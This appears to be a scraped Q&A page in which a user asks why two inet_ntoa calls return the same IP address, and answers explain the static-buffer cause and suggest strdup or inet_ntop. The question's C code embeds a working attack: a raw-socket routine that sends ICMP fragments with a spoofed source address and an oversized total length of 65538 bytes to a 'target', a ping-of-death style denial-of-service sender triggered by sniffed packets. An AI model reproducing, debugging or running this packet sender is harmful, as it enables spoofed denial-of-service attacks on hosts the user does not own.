Clever Geek Handbook

Why are the two lines printing the same value when I assigned different values ​​to them?

void
got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
{

static int count = 1;                   /* packet counter */

/* declare pointers to packet headers */
const struct sniff_ethernet *ethernet;  /* The ethernet header [1] */
const struct sniff_ip *ip;              /* The IP header */
const struct sniff_tcp *tcp;            /* The TCP header */
const char *payload;                    /* Packet payload */

int size_ip;
int size_tcp;
int size_payload;

printf("\nPacket number %d:\n", count);
count++;

/* define ethernet header */
ethernet = (struct sniff_ethernet*)(packet);

/* define/compute ip header offset */
ip = (struct sniff_ip*)(packet + SIZE_ETHERNET);
size_ip = IP_HL(ip)*4;
if (size_ip < 20) {
    printf("   * Invalid IP header length: %u bytes\n", size_ip);
    return;
}

/* print source and destination IP addresses */
printf("       From: %s\n", inet_ntoa(ip->ip_src));//<-------------------------
printf("         To: %s\n", inet_ntoa(ip->ip_dst));//<------------------------

/* determine protocol */    
switch(ip->ip_p) {
    case IPPROTO_TCP:
        printf("   Protocol: TCP\n");
        break;
    case IPPROTO_UDP:
        printf("   Protocol: UDP\n");
        return;
    case IPPROTO_ICMP:
        printf("   Protocol: ICMP\n");

     /*********************************************************************************************/

    char *sinfo[1];
sinfo[0] = inet_ntoa(ip->ip_src);//<----------------------------

char *dinfo[1];
dinfo[0] = inet_ntoa(ip->ip_dst);//<----------------------------

int s, i;
char buf[400];
struct ip *ip = (struct ip *)buf;
struct icmphdr *icmp = (struct icmphdr *)(ip + 1);
struct hostent *hp, *hp2;
struct sockaddr_in dst;
int offset;
int on;
//int num = 5;

 printf("%s- saddress is the spoofed source address\n", sinfo[0]);
 printf("%s- dstaddress is the target\n", dinfo[0]);
 printf("- number is the number of packets to send, 2 is the default\n");

/* Loop based on the packet number */
for(i=1;i<=2;i++)
{
        on = 1;
    bzero(buf, sizeof(buf));

       /* Create RAW socket */
       if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
       {
        perror("socket() error");
        /* If something wrong, just exit */
            exit(1);
       }

       /* socket options, tell the kernel we provide the IP structure */
       if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0)
       {
            perror("setsockopt() for IP_HDRINCL error");
            exit(1);
       }

       if((hp = gethostbyname(dinfo[0])) == NULL)
       {
            if((ip->ip_dst.s_addr = inet_addr(dinfo[0])) == -1)
            {
                fprintf(stderr, "%s: Can't resolve, unknown host.\n", dinfo[0]);
                exit(1);
            }   
       }
    else
        bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);

    /* The following source address just redundant for target to collect */
    if((hp2 = gethostbyname(sinfo[0])) == NULL)
    {
     if((ip->ip_src.s_addr = inet_addr(sinfo[0])) == -1)
     {
         fprintf(stderr, "%s: Can't resolve, unknown host\n", sinfo[0]);
         exit(1);
     }
    }
    else
        bcopy(hp2->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);

    printf("Sending to %s from spoofed %s\n", inet_ntoa(ip->ip_dst), sinfo[0]);

    /* Ip structure, check the ip.h */
    ip->ip_v = 4;
    ip->ip_hl = sizeof*ip >> 2;
    ip->ip_tos = 0;
    ip->ip_len = htons(sizeof(buf));
    ip->ip_id = htons(4321);
    ip->ip_off = htons(0);
    ip->ip_ttl = 255;
    ip->ip_p = 1;
    ip->ip_sum = 0; /* Let kernel fills in */

    dst.sin_addr = ip->ip_dst;
    dst.sin_family = AF_INET;

    icmp->type = ICMP_ECHO;
    icmp->code = 0;
    /* Header checksum */
    icmp->checksum = htons(~(ICMP_ECHO << 8));

    for(offset = 0; offset < 65536; offset += (sizeof(buf) - sizeof(*ip)))
    {
    ip->ip_off = htons(offset >> 3);

    if(offset < 65120)
     ip->ip_off |= htons(0x2000);
    else
      ip->ip_len = htons(418); /* make total 65538 */

    /* sending time */
    if(sendto(s, buf, sizeof(buf), 0, (struct sockaddr *)&dst, sizeof(dst)) < 0)
    {
       fprintf(stderr, "offset %d: ", offset);
       perror("sendto() error");
    }
 else
   printf("sendto() is OK.\n");

    /* IF offset = 0, define our ICMP structure */
    if(offset == 0)
    {
    icmp->type = 0;
    icmp->code = 0;
    icmp->checksum = 0;
    }
   }
  /* close socket */
  close(s);
  sleep(300);
 }
//    return 0;
//}

/******************************************************************************************/


        return;
    case IPPROTO_IP:
        printf("   Protocol: IP\n");
        return;
    default:
        printf("   Protocol: unknown\n");
        return;
} 

/*
 *  OK, this packet is TCP.
 */

/* define/compute tcp header offset */
tcp = (struct sniff_tcp*)(packet + SIZE_ETHERNET + size_ip);
size_tcp = TH_OFF(tcp)*4;
if (size_tcp < 20) {
    printf("   * Invalid TCP header length: %u bytes\n", size_tcp);
    return;
}

printf("   Src port: %d\n", ntohs(tcp->th_sport));
printf("   Dst port: %d\n", ntohs(tcp->th_dport));

/* define/compute tcp payload (segment) offset */
payload = (u_char *)(packet + SIZE_ETHERNET + size_ip + size_tcp);

/* compute tcp payload (segment) size */
size_payload = ntohs(ip->ip_len) - (size_ip + size_tcp);

/*
 * Print payload data; it might be binary, so don't just
 * treat it as a string.
 */
if (size_payload > 0) {
    printf("   Payload (%d bytes):\n", size_payload);
    print_payload(payload, size_payload);
}

return;
}

In the above code, I am trying to store 2 ip addresses. One is the source IP address and the other is the destination IP address. I've created 2 lines and stored the source address in a sinfo string variable and the destination address in a variable labeled dinfo. However, sinfo and dinfo output the same address. Here's the result:

Package number 1:

From: 192.168.29.138

To: 192.168.0.130

Protocol: ICMP

192.168.0.130- chest is a fake source address

192.168.0.130- dstaddress is the target

  • number - number of sent packets, 2 - default value

Sending to 192.168.0.130 from spoofed 192.168.0.130

It prints From: and To: correctly, but not for sinfo and dinfo. I do not know what's the problem.

+3


source to share


2 answers


inet_ntoa()

returns a pointer to a static buffer, so the second call overwrites the result of the first call:

char *sinfo[1];
sinfo[0] = inet_ntoa(ip->ip_src);

char *dinfo[1];
dinfo[0] = inet_ntoa(ip->ip_dst);

dinfo[0]

and sinfo[0]

now both are pointing to the same (static) buffer - the buffer only contains the result from the second call. You need to copy the result from inet_ntoa () into your own buffer (I'm also not sure why you are using an array of pointers of size 1, a simple pointer is enough):

char *sinfo = strdup(inet_ntoa(ip->ip_src));
char *dinfo = strdup(inet_ntoa(ip->ip_dst));
...
free(sinfo);
free(dinfo);


As suggested by @cnicutar, you can also use inet_ntop , which does not use a static buffer, but allows you to pass the destination buffer directly:

char str[INET_ADDRSTRLEN];
inet_ntop(AF_INET, &addr, str, INET_ADDRSTRLEN);

Also, it inet_ntoa()

does not handle IPv6 , it inet_ntop()

does.

+5


source


The value returned cannot be stored inet_ntoa

as it is overwritten by subsequent calls:

USE APPLICATIONS

The return value of inet_ntoa () can point to static data that can be overwritten by subsequent calls to inet_ntoa ().

Instead, you should use strdup

:

sinfo[0] = strdup(inet_ntoa(ip->ip_src));


And remember free(sinfo[0])

. The same goes for dinfo[0]

.

All that said, moving to the recommended one is better on many levels, and will also solve your specific problem. inet_ntop

+4


source






More articles:


All Articles